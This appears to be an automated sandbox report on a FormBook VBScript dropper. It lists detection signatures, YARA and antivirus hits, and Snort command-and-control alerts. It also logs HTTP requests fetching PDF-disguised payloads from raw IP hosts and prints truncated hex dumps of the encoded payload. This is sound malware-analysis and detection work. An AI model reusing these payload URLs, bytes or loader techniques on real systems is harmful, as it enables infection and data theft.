Windows Analysis Report
daveCrpted.vbs

Overview

General Information

Sample Name: daveCrpted.vbs
Analysis ID: 635407
MD5: dc70eefa088f688d1cd4c4cf2c6674ca
SHA1: c358867a468d9722b3c40f0bcd0cbe2534756545
SHA256: 1ec2c2c0a29c16146400c52880e887cfae57223b2b621c0f433ef9b619af5343
Tags: FormbookvbsXloader
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: daveCrpted.vbs ReversingLabs: Detection: 12%
Yara detected FormBook
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdfPk Avira URL Cloud: Label: malware
Source: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf Avira URL Cloud: Label: malware
Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdf Avira URL Cloud: Label: malware
Source: http://20.106.232.4 Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://2.56.57.22 Virustotal: Detection: 8% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 24.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.RegAsm.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.0.RegAsm.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.RegAsm.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.0.RegAsm.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: cmmon32.pdb source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000009.00000002.574613863.0000000002C5F000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.469567195.0000000002810000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.574322688.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.471300384.00000000029AD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe
Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi 9_2_00415B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 23_2_03215B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi 24_2_00415B28

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.5:49738
Source: Traffic Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.5:49778
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:31 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:26:51 GMT ETag: "3aac-5dfeafb144fa1" Accept-Ranges: bytes Content-Length: 15020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 34 51 4e 70 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 43 51 41 41 41 41 47 41 41 41 41 41 41 41 41 72 6b 49 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 67 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 42 43 41 41 42 4c 41 41 41 41 41 47 41 41 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 41 41 63 51 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 74 43 49 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 59 41 41 41 41 41 51 41 41 41 41 6d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 49 41 41 41 41 41 43 41 41 41 41 4b 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 51 51 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 58 43 51 41 41 41 67 64 41 41 41 44 41 41 41 41 41 41 41 41 41 47 52 42 41 41 43 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 34 43 4b 41 45 41 41 41 6f 71 48 67 49 6f 41 67 41 41 43 69 71 6d 63 77 4d 41 41 41 71 41 41 51 41 41 42 48 4d 45 41 41 41 4b 67 41 49 41 41 41 52 7a 42 51 41 41 43 6f 41 44 41 41 41 45 63 77 59 41 41 41 71 41 42 41 41 41 42 43 6f 41 41 43 35 2b 41 51 41 41 42 47 38 48 41 41 41 4b 4b 69 35 2b 41 67 41 41 42 47 3
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:32 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:25:11 GMT ETag: "1a580-5dfeaf520524a" Accept-Ranges: bytes Content-Length: 107904 Content-Type: application/pdf Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:16:25 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:26:51 GMT ETag: "3aac-5dfeafb144fa1" Accept-Ranges: bytes Content-Length: 15020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 34 51 4e 70 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 43 51 41 41 41 41 47 41 41 41 41 41 41 41 41 72 6b 49 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 67 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 42 43 41 41 42 4c 41 41 41 41 41 47 41 41 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 41 41 63 51 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 74 43 49 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 59 41 41 41 41 41 51 41 41 41 41 6d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 49 41 41 41 41 41 43 41 41 41 41 4b 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 51 51 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 58 43 51 41 41 41 67 64 41 41 41 44 41 41 41 41 41 41 41 41 41 47 52 42 41 41 43 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 34 43 4b 41 45 41 41 41 6f 71 48 67 49 6f 41 67 41 41 43 69 71 6d 63 77 4d 41 41 41 71 41 41 51 41 41 42 48 4d 45 41 41 41 4b 67 41 49 41 41 41 52 7a 42 51 41 41 43 6f 41 44 41 41 41 45 63 77 59 41 41 41 71 41 42 41 41 41 42 43 6f 41 41 43 35 2b 41 51 41 41 42 47 38 48 41 41 41 4b 4b 69 35 2b 41 67 41 41 42 47 3
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:16:26 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:25:11 GMT ETag: "1a580-5dfeaf520524a" Accept-Ranges: bytes Content-Length: 107904 Content-Type: application/pdf Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91
Yara detected Generic Downloader
Source: Yara match File source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
